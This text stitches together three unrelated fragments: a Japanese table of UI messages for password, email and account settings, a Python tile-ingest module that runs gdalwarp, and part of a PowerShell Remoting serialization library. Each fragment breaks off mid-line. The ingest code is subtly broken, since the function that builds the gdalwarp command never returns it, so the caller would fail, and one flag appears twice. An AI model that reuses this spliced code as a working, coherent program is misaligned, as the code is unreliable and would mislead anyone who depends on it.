Ary['MOSEN27318'] = "必須項目(パラメータ名)が入力されていません。入力してください。"
Ary['MOSEN27319'] = "パラメータ名は256文字以内で入力してください。"
Ary['MOSEN27320'] = "必須項目(順序)が入力されていません。入力してください。"
Ary['MOSEN27321'] = "必須項目(抽出対象条件名)が入力されていません。入力してください。"
Ary['MOSEN27322'] = "抽出対象条件名は32文字以内で入力してください。"
Ary['MOSEN27323'] = "抽出方法1は512文字以内で入力してください。"
Ary['MOSEN27324'] = "抽出方法2は512文字以内で入力してください。"
Ary['MOSEN27325'] = "リセットします。\nよろしいですか?"
Ary['MOSEN27326'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN27327'] = "対象データがありません。"
Ary['MOSEN27328'] = "エラーが発生しました。"
Ary['MOSEN27329'] = "メニューグループ:メニュー"
Ary['MOSEN27330'] = "DBから値の取得に失敗しました。"
Ary['MOSEN27331'] = "アクション設定画面に遷移します。"
Ary['MOSEN27332'] = "メッセージ抽出定義の編集画面に遷移します。"
Ary['MOSEN27333'] = "変更内容を破棄してメッセージ抽出定義編集画面を閉じ、メッセージ抽出定義画面に戻ります。"
Ary['MOSEN27334'] = "値を変更する前のメッセージ抽出定義編集画面に戻ります。"
Ary['MOSEN27335'] = "編集欄が1行追加されます。"
Ary['MOSEN27336'] = "新規追加、更新、削除のレコードを保存してメッセージ抽出定義参照画面に遷移します。"
Ary['MOSEN27337'] = "ドライバー名を選択してください。"
Ary['MOSEN27338'] = "ITA連携先のメニュー名を選択してください。"
Ary['MOSEN27339'] = "256文字以内で入力してください。"
Ary['MOSEN27340'] = "「ホスト名」は0を指定してください。"
Ary['MOSEN27341'] = "32文字以内で入力してください。"
Ary['MOSEN27342'] = "512文字以内で入力してください。"
Ary['MOSEN27343'] = "512文字以内で入力してください。"
Ary['MOSEN27344'] = "アクション設定画面で追加したITAドライバ名が表示されます。"
Ary['MOSEN27345'] = "連携を行うITAメニュー名が表示されます。"
Ary['MOSEN27346'] = "抽出項目名が表示されます。"
Ary['MOSEN27347'] = "ITAにて設定したメニューの項目順序が表示されます。"
Ary['MOSEN27348'] = "抽出対象となるディシジョンテーブルファイルの条件名が表示されます。"
Ary['MOSEN27349'] = "抽出対象に対して実施する正規表現が表示されます。"
Ary['MOSEN27350'] = "抽出方法1の結果に対して切り取る文字列が表示されます。"
Ary['MOSEN27351'] = "メッセージ抽出定義の編集権限がありません。"
Ary['MOSEN31001'] = "入力された情報を破棄します。\nよろしいですか?"
Ary['MOSEN31002'] = "パスワードを変更します。\nよろしいですか?"
Ary['MOSEN31003'] = "メールアドレスを変更します。\nよろしいですか?"
Ary['MOSEN31004'] = "メールアドレスが入力されていません。入力してください。"
Ary['MOSEN31005'] = "メールアドレスは256文字以内で入力してください。"
Ary['MOSEN31006'] = "メールアドレスが不正です。修正してください。"
Ary['MOSEN31007'] = "他のメールアドレスと重複しています。修正してください。"
Ary['MOSEN31008'] = "現在のメールアドレスが入力されています。修正してください。"
Ary['MOSEN31009'] = "不正なリクエストです。"
Ary['MOSEN31010'] = "メールアドレスの変更に失敗しました。"
Ary['MOSEN31011'] = "他のユーザーが既に使用しているメールアドレスのため、変更に失敗しました。"
Ary['MOSEN31012'] = "既にメールアドレスの変更が完了しています。"
Ary['MOSEN31013'] = "メールアドレスを変更しました。"
Ary['MOSEN31014'] = "メールアドレスの変更申請に失敗しました。"
Ary['MOSEN31015'] = "メールアドレスの変更確定に失敗しました。"
Ary['MOSEN31016'] = "メールアドレス変更の有効期限を過ぎています。"
Ary['MOSEN31017'] = "メールアドレスの変更を承りました。\n入力されましたメールアドレスに通知が届きます。\nそちらに記載されたURLへアクセスすることで、\nメールアドレスの変更が確定されます。"
Ary['MOSEN31018'] = "メールアドレスに使用できない文字が含まれています。"
Ary['MOSEN31019'] = "アカウント情報"
Ary['MOSEN31020'] = "メールアドレスの変更"
Ary['MOSEN31021'] = "パスワードの変更"
Ary['MOSEN31022'] = "画面設定"
Ary['MOSEN31023'] = "基本情報"
Ary['MOSEN31024'] = "メールアドレスを変更するにはパスワードが必要です。"
Ary['MOSEN31025'] = "パスワード"
Ary['MOSEN31026'] = "8文字以上64文字以内で入力してください。"
Ary['MOSEN31027'] = "変更すると、新しいメールアドレスに認証メールが届きます。"
Ary['MOSEN31028'] = "新しいメールアドレス"
Ary['MOSEN31029'] = "メールアドレスを変更する"
Ary['MOSEN31030'] = "パスワードを変更します。"
Ary['MOSEN31031'] = "現在のパスワード"
Ary['MOSEN31032'] = "最低8文字以上"
Ary['MOSEN31033'] = r"半角英字(大文字)、半角英字(小文字)、半角数字、記号(!#$%%&()*+,-./;<=>?@\[]^_{}|~)を含む"
Ary['MOSEN31034'] = "過去"
Ary['MOSEN31035'] = "世代で同一パスワードは設定不可"
Ary['MOSEN31036'] = "新しいパスワード"
Ary['MOSEN31037'] = "新しいパスワード再入力"
Ary['MOSEN31038'] = "パスワードを変更する"
Ary['MOSEN31039'] = "認証するまでメールアドレスは変更されません。"
Ary['MOSEN31040'] = "変更されました。"
Ary['MOSEN32000'] = "パスワード変更"
Ary['MOSEN32001'] = "パスワードの有効期間が過ぎています。パスワード変更をお願いします。"
Ary['MOSEN32002'] = "既存のパスワードと新パスワードを入力してください。"
Ary['MOSEN32003'] = "8文字以上、64文字以下"
Ary['MOSEN32004'] = r"半角英字(大文字)、半角英字(小文字)、半角数字、記号(!#$%%&()*+,-./;<=>?@\[]^_{}|~)を含む"
Ary['MOSEN32005'] = "過去%(strConName)s世代で同一パスワードは設定できません。"
Ary['MOSEN32006'] = "パスワードを変更します。\nよろしいですか?"
Ary['MOSEN32007'] = "変更されました。"
Ary['MOSEN32008'] = "エラーが発生しました。\n"
Ary['MOSEN32009'] = "不正なリクエストです。"
Ary['MOSEN32010'] = "*ユーザが取得できません。"
Ary['MOSEN32011'] = "*パスワード設定が取得できません。"
Ary['MOSEN32012'] = "*既存のパスワードが入力されていません。"
Ary['MOSEN32013'] = "*既存のパスワードが一致しません。"
Ary['MOSEN32014'] = "*新パスワードが入力されていません。"
Ary['MOSEN32015'] = "*大小英文字・数字・記号の全てを含めた8文字以上のパスワードを設定してください。"
Ary['MOSEN32016'] = "*新パスワードが一致していません。"
Ary['MOSEN32017'] = "*パスワード履歴が取得できません。"
Ary['MOSEN32018'] = "*入力されたパスワードは制限されています。"
Ary['MOSEN32019'] = "DBの更新に失敗しました。"
Ary['MOSEN32020'] = "初期パスワードからの変更をお願いします。"
Ary['MOSEN32021'] = "初期パスワードと新パスワードを入力してください。"
Ary['MOSEN32022'] = "パスワードは次の条件が必要です。"
Ary['MOSEN32023'] = "ワンタイムパスワードの期限を超過しました。[パスワードをお忘れの場合]をクリックすると再設定できます。"
Ary['MOSEN32024'] = "パスワードリセット"
Ary['MOSEN32025'] = "登録されているログインIDとメールアドレスを入力してください。"
Ary['MOSEN32026'] = "入力されたメールアドレスに対して、ワンタイムパスワードを通知します。"
Ary['MOSEN32027'] = "ワンタイムパスワードの有効期限は、%(strConName)s時間です。"
Ary['MOSEN32028'] = "%(strConName)s時間以上経過するとワンタイムパスワードは、無効となるため、再度パスワードリセットを行ってください。"
Ary['MOSEN32029'] = "変更を破棄してパスワードリセットへ移動しますがよろしいですか?"
Ary['MOSEN32030'] = "パスワードリセットを中断しますがよろしいですか?"
Ary['MOSEN32031'] = "ログインIDが存在しません。再入力してください。ユーザ登録が必要な場合は、システム管理者へ依頼してください。"
Ary['MOSEN32032'] = "登録されているメールアドレスと一致しません。再入力してください。メールアドレスの変更が必要な場合は、システム管理者へ依頼してください。"
Ary['MOSEN32033'] = "入力された情報を破棄します。\nよろしいですか?"
Ary['MOSEN32034'] = "ワンタイムパスワードからの変更をお願いします。"
Ary['MOSEN32035'] = "ワンタイムパスワードと新パスワードを入力してください。"
Ary['MOSEN32036'] = "パスワードをリセットします。\nよろしいですか?"
Ary['MOSEN32037'] = "パスワードがリセットされました。"
Ary['MOSEN32038'] = "パスワードが一致しません。"
Ary['MOSEN32039'] = "既存のパスワード"
Ary['MOSEN32040'] = "新規のパスワード"
Ary['MOSEN32041'] = "新規のパスワードの再入力"
Ary['MOSEN32042'] = "変更"
Ary['MOSEN32043'] = "ログインIDをお忘れの場合はお問い合わせください。"
Ary['MOSEN32044'] = "パスワードをリセット"
Ary['MOSEN33000'] = "アカウントをロックされているユーザは存在しません。"
Ary['MOSEN33001'] = "解除するユーザが存在しません。\n入力内容を確認してください。"
Ary['MOSEN33002'] = "解除に失敗しました。"
Ary['MOSEN33003'] = "エラーが発生しました。"
Ary['MOSEN33004'] = "権限がないため解除に失敗しました。\nシステム設定画面のパスワード設定項目にて、メール通知対象となっているかご確認ください。"
Ary['MOSEN33005'] = "Account | |
<filename>agdc/abstract_ingester/tile_contents.py
#!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
TileContents: database interface class.
These classes provide an interface between the database and the top-level
ingest algorithm (AbstractIngester and its subclasses). They also provide
the implementation of the database and tile store side of the ingest
process. They are expected to be independent of the structure of any
particular dataset, but will change if the database schema or tile store
format changes.
"""
from __future__ import absolute_import
import shutil
import logging
import os
import re
from datetime import datetime
from osgeo import gdal
import numpy as np
from eotools.execute import execute
from eotools.utils import log_multiline
from ..cube_util import DatasetError, create_directory, get_file_size_mb
# Set up LOGGER.
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
#
# Constants for PQA nodata check:
#
PQA_CONTIGUITY = 256 # contiguity = bit 8
GDAL_CACHEMAX_MB = 500
# Working buffers (in MB)
# GDAL_WM_MB = 500
class TileContents(object):
"""TileContents database interface class."""
# pylint: disable=too-many-instance-attributes
def __init__(self, tile_output_path, tile_type_info,
tile_footprint, provisional_directory, band_stack):
"""Set the tile_footprint over which we want to resample this dataset.
:type band_stack: AbstractBandstack
"""
self.tile_type_id = tile_type_info['tile_type_id']
self.tile_type_info = tile_type_info
self.tile_footprint = tile_footprint
self._band_stack = band_stack
self.tile_output_path = tile_output_path
#Set the provisional tile location to be the same as the vrt created
#for the scenes
self._temp_tile_output_path = os.path.join(provisional_directory, os.path.basename(self.tile_output_path))
# Work-around to allow existing GDAL code to work with netCDF subdatasets as band stacks
# N.B: file_extension must be set to ".vrt" when used with netCDF
#TODO: Change all code to use netCDF libraries instead of GDAL for netCDF file handling
if self.tile_type_info['file_format'] == 'netCDF' and tile_type_info['file_extension'] == '.vrt':
self.nc_temp_tile_output_path = re.sub('\.vrt$', '.nc', self._temp_tile_output_path)
self.nc_tile_output_path = re.sub('\.vrt$', '.nc', self.tile_output_path)
else:
self.nc_temp_tile_output_path = None
self.nc_tile_output_path = None
@property
def tile_extents(self):
return _tile_extents(self.tile_footprint, self.tile_type_info)
def has_data(self):
if not os.path.exists(self._temp_tile_output_path):
raise DatasetError('No reprojected tile has been produced.')
return _has_data(self._temp_tile_output_path, self._band_stack)
def reproject(self):
"""Reproject the scene dataset into tile coordinate reference system
and extent. This method uses gdalwarp to do the reprojection."""
# Work-around to allow existing code to work with netCDF subdatasets as GDAL band stacks
temp_tile_output_path = self.nc_temp_tile_output_path or self._temp_tile_output_path
_reproject(self.tile_type_info, self.tile_footprint, self._band_stack, temp_tile_output_path)
# Work-around to allow existing code to work with netCDF subdatasets as GDAL band stacks
if self.nc_temp_tile_output_path:
_nc2vrt(self.nc_temp_tile_output_path, temp_tile_output_path)
def remove(self):
"""Remove tiles that were in coverage but have no data. Also remove
tiles if we are rolling back the transaction."""
if os.path.isfile(self._temp_tile_output_path):
os.remove(self._temp_tile_output_path)
def make_permanent(self):
"""Move the tile file to its permanent location."""
if os.path.exists(self.tile_output_path) \
and not os.path.exists(self._temp_tile_output_path)\
and self.nc_temp_tile_output_path is None:
LOGGER.info('Tile already in place: %r', self.tile_output_path)
return
source_dir = os.path.abspath(os.path.dirname(self._temp_tile_output_path))
dest_dir = os.path.abspath(os.path.dirname(self.tile_output_path))
create_directory(dest_dir)
# If required, edit paths in re-written .vrt file and move .nc file
if self.nc_tile_output_path:
vrt_file = open(self._temp_tile_output_path, 'r')
vrt_string = vrt_file.read()
vrt_file.close()
vrt_string = vrt_string.replace(source_dir, dest_dir) # Update all paths in VRT file
vrt_file = open(self.tile_output_path, 'w')
vrt_file.write(vrt_string)
vrt_file.close()
# Move .nc file
shutil.move(self.nc_temp_tile_output_path, self.nc_tile_output_path)
else: # No .vrt file required - just move the tile file
shutil.move(self._temp_tile_output_path, self.tile_output_path)
def get_output_path(self):
"""Return the final location for the tile."""
return self.tile_output_path
def get_output_size_mb(self):
path = self._temp_tile_output_path
if not os.path.exists(path):
path = self.tile_output_path
return get_file_size_mb(path)
def _tile_extents(tile_footprint, tile_type_info):
x_origin = tile_type_info['x_origin']
y_origin = tile_type_info['y_origin']
x_size = tile_type_info['x_size']
y_size = tile_type_info['y_size']
x0 = x_origin + tile_footprint[0] * x_size
y0 = y_origin + tile_footprint[1] * y_size
return x0, y0, x0 + x_size, y0 + y_size
def _make_format_spec(tile_type_info):
format_spec = []
for format_option in tile_type_info['format_options'].split(','):
format_spec.extend(["-co", "%s" % format_option])
return format_spec
def _create_reproject_command(band_stack, first_file_number, nodata_value, temp_tile_output_path, tile_footprint,
tile_type_info):
resampling_method = (
band_stack.band_dict[first_file_number]['resampling_method']
)
if nodata_value is not None:
# TODO: Check this works for PQA, where
# band_dict[10]['resampling_method'] == None
nodata_spec = [
"-srcnodata",
"%d" % nodata_value,
"-dstnodata",
"%d" % nodata_value
]
else:
nodata_spec = []
tile_extents = _tile_extents(tile_footprint, tile_type_info)
reproject_cmd = [
"gdalwarp",
'--config', 'GDAL_CACHEMAX', str(GDAL_CACHEMAX_MB),
# Changing the warp memory size altered pixel values. Disable until further tests are performed.
# '-wm', str(GDAL_WM_MB),
"-q",
"-of",
"%s" % tile_type_info['file_format'],
"-t_srs",
"%s" % tile_type_info['crs'],
"-te",
"%f" % tile_extents[0],
"%f" % tile_extents[1],
"%f" % tile_extents[2],
"%f" % tile_extents[3],
"-tr",
"%f" % tile_type_info['x_pixel_size'],
"%f" % tile_type_info['y_pixel_size'],
"-tap",
"-tap",
"-r",
"%s" % resampling_method,
]
reproject_cmd.extend(nodata_spec)
reproject_cmd.extend(_make_format_spec(tile_type_info))
reproject_cmd.extend([
"-overwrite",
"%s" % band_stack.vrt_name,
"%s" % temp_tile_output_path # Use locally-defined output path, not class instance value
])
def _reproject(tile_type_info, tile_footprint, band_stack, output_path):
nodata_value = band_stack.nodata_list[0]
# Assume resampling method is the same for all bands, this is
# because resampling_method is per proessing_level
# TODO assert this is the case
first_file_number = band_stack.band_dict.keys()[0]
reproject_cmd = _create_reproject_command(band_stack, first_file_number, nodata_value,
output_path, tile_footprint, tile_type_info)
command_string = ' '.join(reproject_cmd)
LOGGER.info('Performing gdalwarp for tile %s', tile_footprint)
retry = True
while retry:
LOGGER.debug('command_string = %s', command_string)
start_datetime = datetime.now()
result = execute(command_string)
LOGGER.debug('gdalwarp time = %s', datetime.now() - start_datetime)
if result['stdout']:
log_multiline(LOGGER.debug, result['stdout'], 'stdout from ' + command_string, '\t')
if result['returncode']: # Return code is non-zero
log_multiline(LOGGER.error, result['stderr'], 'stderr from ' + command_string, '\t')
# Work-around for gdalwarp error writing LZW-compressed GeoTIFFs
if (result['stderr'].find('LZW') > -1 # LZW-related error
and tile_type_info['file_format'] == 'GTiff' # Output format is GeoTIFF
and 'COMPRESS=LZW' in tile_type_info['format_options']): # LZW compression requested
uncompressed_tile_path = output_path + '.tmp'
# Write uncompressed tile to a temporary path
command_string = command_string.replace('COMPRESS=LZW', 'COMPRESS=NONE')
command_string = command_string.replace(output_path, uncompressed_tile_path)
# Translate temporary uncompressed tile to final compressed tile
command_string += '; gdal_translate -of GTiff'
command_string += ' ' + ' '.join(_make_format_spec(tile_type_info))
command_string += ' %s %s' % (
uncompressed_tile_path,
output_path
)
LOGGER.info('Creating compressed GeoTIFF tile via temporary uncompressed GeoTIFF')
else:
raise DatasetError('Unable to perform gdalwarp: ' +
'"%s" failed: %s' % (command_string,
result['stderr']))
else:
retry = False # No retry on success
def _nc2vrt(nc_path, vrt_path):
"""Create a VRT file to present a netCDF file with multiple subdatasets to GDAL as a band stack"""
nc_abs_path = os.path.abspath(nc_path)
vrt_abs_path = os.path.abspath(vrt_path)
# Create VRT file using absolute pathnames
nc2vrt_cmd = "gdalbuildvrt -separate -allow_projection_difference -overwrite %s %s" % (
vrt_abs_path, nc_abs_path)
LOGGER.debug('nc2vrt_cmd = %s', nc2vrt_cmd)
result = execute(nc2vrt_cmd) #, shell=False)
if result['returncode'] != 0:
raise DatasetError('Unable to perform gdalbuildvrt: ' +
'"%s" failed: %s' % (nc2vrt_cmd,
result['stderr']))
def _has_data(tile_path, band_stack):
"""Check if the reprojection gave rise to a tile with valid data.
Open the file and check if there is data
:type tile_path: str
:type band_stack: AbstractBandStack
"""
tile_dataset = gdal.Open(tile_path)
start_datetime = datetime.now()
if tile_dataset.RasterCount != len(band_stack.band_dict):
raise DatasetError(
(
"Number of layers (%d) in tile file\n %s\n"
"does not match number of bands "
"(%d) from database."
) % (
tile_dataset.RasterCount,
tile_path,
len(band_stack.band_dict)
)
)
# Convert self.band_stack.band_dict into list of elements sorted by tile_layer
band_list = [
band_stack.band_dict[file_number]
for file_number in sorted(
band_stack.band_dict.keys(),
key=lambda f_number: band_stack.band_dict[f_number]['tile_layer']
)
]
result = False
# Read each band in individually - will be quicker for non-empty tiles but slower for empty ones
for band_index in range(tile_dataset.RasterCount):
| |
behaviour of where to merge the
'merge_my_result' stream. Only supports NONE or OUTPUT (only used
in protocol 2.1)
:param merge_previous: Controls the behaviour of where to merge the
previous Output and Error streams that have been unclaimed
:param merge_error: The merge behaviour of the Error stream
:param merge_warning: The merge behaviour of the Warning stream
:param merge_verbose: The merge behaviour of the Verbose stream
:param merge_debug: The merge behaviour of the Debug stream
:param merge_information: The merge behaviour of the Information stream
:param args: List of CommandParameters for the cmdlet being invoked
:param end_of_statement: Whether this command is the last in the
current statement
"""
super(Command, self).__init__()
arg_types = [
"System.Collections.Generic.List`1[["
"System.Management.Automation.PSObject, "
"System.Management.Automation, "
"Version=1.0.0.0, Culture=neutral, "
"PublicKeyToken=31bf3856ad364e35]]",
"System.Object",
]
extended_properties = [
('cmd', ObjectMeta("S", name="Cmd")),
('is_script', ObjectMeta("B", name="IsScript")),
('use_local_scope', ObjectMeta("B", name="UseLocalScope")),
('merge_my_result', ObjectMeta("Obj", name="MergeMyResult",
object=PipelineResultTypes)),
('merge_to_result', ObjectMeta("Obj", name="MergeToResult",
object=PipelineResultTypes)),
('merge_previous', ObjectMeta("Obj", name="MergePreviousResults",
object=PipelineResultTypes)),
('args', ListMeta(
name="Args",
list_value_meta=ObjectMeta(object=CommandParameter),
list_types=arg_types)
),
]
if version_equal_or_newer(protocol_version, "2.2"):
extended_properties.extend([
('merge_error', ObjectMeta("Obj", name="MergeError",
object=PipelineResultTypes,
optional=True)),
('merge_warning', ObjectMeta("Obj", name="MergeWarning",
object=PipelineResultTypes,
optional=True)),
('merge_verbose', ObjectMeta("Obj", name="MergeVerbose",
object=PipelineResultTypes,
optional=True)),
('merge_debug', ObjectMeta("Obj", name="MergeDebug",
object=PipelineResultTypes,
optional=True)),
])
if version_equal_or_newer(protocol_version, "2.3"):
extended_properties.extend([
('merge_information', ObjectMeta(
"Obj", name="MergeInformation",
object=PipelineResultTypes,
optional=True
)),
])
self._extended_properties = extended_properties
self.protocol_version = protocol_version
self.cmd = kwargs.get("cmd")
self.is_script = kwargs.get("is_script")
self.use_local_scope = kwargs.get("use_local_scope")
none_merge = PipelineResultTypes(value=PipelineResultTypes.NONE)
# valid in all protocols, only really used in 2.1 (PowerShell 2.0)
self.merge_my_result = kwargs.get("merge_my_result", none_merge)
self.merge_to_result = kwargs.get("merge_to_result", none_merge)
self.merge_previous = kwargs.get("merge_previous", none_merge)
# only valid for 2.2+ (PowerShell 3.0+)
self.merge_error = kwargs.get("merge_error", none_merge)
self.merge_warning = kwargs.get("merge_warning", none_merge)
self.merge_verbose = kwargs.get("merge_verbose", none_merge)
self.merge_debug = kwargs.get("merge_debug", none_merge)
# only valid for 2.3+ (PowerShell 5.0+)
self.merge_information = kwargs.get("merge_information", none_merge)
self.args = kwargs.get("args", [])
# not used in the serialized message but controls how Pipeline is
# packed (Cmds/ExtraCmds)
self.end_of_statement = kwargs.get("end_of_statement", False)
class CommandParameter(ComplexObject):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.13 Command Parameter
https://msdn.microsoft.com/en-us/library/dd359709.aspx
:param name: The name of the parameter, otherwise None
:param value: The value of the parameter, can be any primitive type
or Complex Object, Null for no value
"""
super(CommandParameter, self).__init__()
self._extended_properties = (
('name', ObjectMeta("S", name="N")),
('value', ObjectMeta(name="V")),
)
self.name = kwargs.get('name')
self.value = kwargs.get('value')
# The host default data is serialized quite differently from the normal rules
# this contains some sub classes that are specific to the serialized form
class _HostDefaultData(ComplexObject):
class _DictValue(ComplexObject):
def __init__(self, **kwargs):
super(_HostDefaultData._DictValue, self).__init__()
self._extended_properties = (
('value_type', ObjectMeta("S", name="T")),
('value', ObjectMeta(name="V")),
)
self.value_type = kwargs.get('value_type')
self.value = kwargs.get('value')
class _Color(ComplexObject):
def __init__(self, color):
super(_HostDefaultData._Color, self).__init__()
self._extended_properties = (
('type', ObjectMeta("S", name="T")),
('color', ObjectMeta("I32", name="V")),
)
self.type = "System.ConsoleColor"
self.color = color.value
class _Coordinates(ComplexObject):
def __init__(self, coordinates):
super(_HostDefaultData._Coordinates, self).__init__()
self._extended_properties = (
('type', ObjectMeta("S", name="T")),
('value', ObjectMeta("ObjDynamic", name="V",
object=GenericComplexObject)),
)
self.type = "System.Management.Automation.Host.Coordinates"
self.value = GenericComplexObject()
self.value.extended_properties['x'] = coordinates.x
self.value.extended_properties['y'] = coordinates.y
class _Size(ComplexObject):
def __init__(self, size):
super(_HostDefaultData._Size, self).__init__()
self._extended_properties = (
('type', ObjectMeta("S", name="T")),
('value', ObjectMeta("ObjDynamic", name="V",
object=GenericComplexObject)),
)
self.type = "System.Management.Automation.Host.Size"
self.value = GenericComplexObject()
self.value.extended_properties['width'] = size.width
self.value.extended_properties['height'] = size.height
def __init__(self, **kwargs):
# Used by HostInfo to encapsulate the host info values inside a
# special object required by PSRP
super(_HostDefaultData, self).__init__()
key_meta = ObjectMeta("I32", name="Key")
self._extended_properties = (
('_host_dict', DictionaryMeta(name="data",
dict_key_meta=key_meta)),
)
self.raw_ui = kwargs.get('raw_ui')
@property
def _host_dict(self):
return (
(0, self._Color(self.raw_ui.foreground_color)),
(1, self._Color(self.raw_ui.background_color)),
(2, self._Coordinates(self.raw_ui.cursor_position)),
(3, self._Coordinates(self.raw_ui.window_position)),
(4, self._DictValue(value_type="System.Int32",
value=self.raw_ui.cursor_size)),
(5, self._Size(self.raw_ui.buffer_size)),
(6, self._Size(self.raw_ui.window_size)),
(7, self._Size(self.raw_ui.max_window_size)),
(8, self._Size(self.raw_ui.max_physical_window_size)),
(9, self._DictValue(value_type="System.String",
value=self.raw_ui.window_title)),
)
class HostInfo(ComplexObject):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.14 HostInfo
https://msdn.microsoft.com/en-us/library/dd340936.aspx
:param host: An implementation of pypsrp.host.PSHost that defines the
local host
"""
super(HostInfo, self).__init__()
self._extended_properties = (
('_host_data', ObjectMeta("Obj", name="_hostDefaultData",
optional=True, object=_HostDefaultData)),
('_is_host_null', ObjectMeta("B", name="_isHostNull")),
('_is_host_ui_null', ObjectMeta("B", name="_isHostUINull")),
('_is_host_raw_ui_null', ObjectMeta("B", name="_isHostRawUINull")),
('_use_runspace_host', ObjectMeta("B", name="_useRunspaceHost")),
)
self.host = kwargs.get('host', None)
@property
def _is_host_null(self):
return self.host is None
@property
def _is_host_ui_null(self):
if self.host is not None:
return self.host.ui is None
else:
return True
@property
def _is_host_raw_ui_null(self):
if self.host is not None and self.host.ui is not None:
return self.host.ui.raw_ui is None
else:
return True
@property
def _use_runspace_host(self):
return self.host is None
@property
def _host_data(self):
if self._is_host_raw_ui_null:
return None
else:
host_data = _HostDefaultData(raw_ui=self.host.ui.raw_ui)
return host_data
class ErrorRecord(ComplexObject):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.15 ErrorRecord
https://msdn.microsoft.com/en-us/library/dd340106.aspx
"""
super(ErrorRecord, self).__init__()
self._types = [
"System.Management.Automation.ErrorRecord",
"System.Object"
]
self._extended_properties = (
('exception', ObjectMeta(name="Exception", optional=True)),
('target_object', ObjectMeta(name="TargetObject", optional=True)),
('invocation', ObjectMeta("B", name="SerializeExtendedInfo")),
('invocation_info', ObjectMeta("ObjDynamic", name="InvocationInfo",
object=GenericComplexObject,
optional=True)),
('fq_error', ObjectMeta("S", name="FullyQualifiedErrorId")),
('category', ObjectMeta("I32", name="ErrorCategory_Category")),
('activity', ObjectMeta("S", name="ErrorCategory_Activity",
optional=True)),
('reason', ObjectMeta("S", name="ErrorCategory_Reason",
optional=True)),
('target_name', ObjectMeta("S", name="ErrorCategory_TargetName",
optional=True)),
('target_type', ObjectMeta("S", name="ErrorCategory_TargetType",
optional=True)),
('message', ObjectMeta("S", name="ErrorCategory_Message",
optional=True)),
('details_message', ObjectMeta("S", name="ErrorDetails_Message",
optional=True)),
('action', ObjectMeta("S", name="ErrorDetails_RecommendedAction",
optional=True)),
('script_stacktrace', ObjectMeta(
"S",
name="ErrorDetails_ScriptStackTrace",
optional=True
)),
('extended_info_present', ObjectMeta(
"B", name="SerializeExtendedInfo"
)),
('invocation_name', ObjectMeta(
"S",
optional=True,
name="InvocationInfo_InvocationName"
)),
('invocation_bound_parameters', DictionaryMeta(
name="InvocationInfo_BoundParameters",
optional=True,
dict_key_meta=ObjectMeta("S"),
dict_types=[
"System.Management.Automation.PSBoundParametersDictionary",
"System.Collections.Generic.Dictionary`2[[System.String, "
"mscorlib, Version=4.0.0.0, Culture=neutral, "
"PublicKeyToken=b77a5c561934e089],"
"[System.Object, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
)),
('invocation_unbound_arguments', ListMeta(
name="InvocationInfo_UnboundArguments",
optional=True,
list_types=[
"System.Collections.Generic.List`1[["
"System.Object, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
)),
('invocation_command_origin', ObjectMeta(
"Obj",
name="InvocationInfo_CommandOrigin",
optional=True,
object=CommandOrigin
)),
('invocation_expecting_input', ObjectMeta(
"B",
name="InvocationInfo_ExpectingInput",
optional=True
)),
('invocation_line', ObjectMeta(
"S",
name="InvocationInfo_Line",
optional=True
)),
('invocation_offset_in_line', ObjectMeta(
"I32",
name="InvocationInfo_OffsetInLine",
optional=True
)),
('invocation_position_message', ObjectMeta(
"S",
name="InvocationInfo_PositionMessage",
optional=True
)),
('invocation_script_name', ObjectMeta(
"S",
name="InvocationInfo_ScriptName",
optional=True
)),
('invocation_script_line_number', ObjectMeta(
"I32",
name="InvocationInfo_ScriptLineNumber",
optional=True
)),
('invocation_history_id', ObjectMeta(
"I64",
name="InvocationInfo_HistoryId",
optional=True
)),
('invocation_pipeline_length', ObjectMeta(
"I32",
name="InvocationInfo_PipelineLength",
optional=True
)),
('invocation_pipeline_position', ObjectMeta(
"I32",
name="InvocationInfo_PipelinePosition",
optional=True
)),
('invocation_pipeline_iteration_info', ListMeta(
name="InvocationInfo_PipelineIterationInfo",
optional=True,
list_value_meta=ObjectMeta("I32"),
list_types=["System.In32[]", "System.Array", "System.Object"]
)),
('command_type', ObjectMeta(
"Obj",
name="CommandInfo_CommandType",
object=CommandType,
optional=True,
)),
('command_definition', ObjectMeta(
"S",
name="CommandInfo_Definition",
optional=True,
)),
('command_name', ObjectMeta(
"S",
name="CommandInfo_Name",
optional=True
)),
('command_visibility', ObjectMeta(
"Obj",
name="CommandInfo_Visibility",
object=SessionStateEntryVisibility,
optional=True
)),
('pipeline_iteration_info', ListMeta(
name="PipelineIterationInfo", optional=True,
list_value_meta=ObjectMeta("I32"),
list_types=[
"System.Collections.ObjectModel.ReadOnlyCollection`1[["
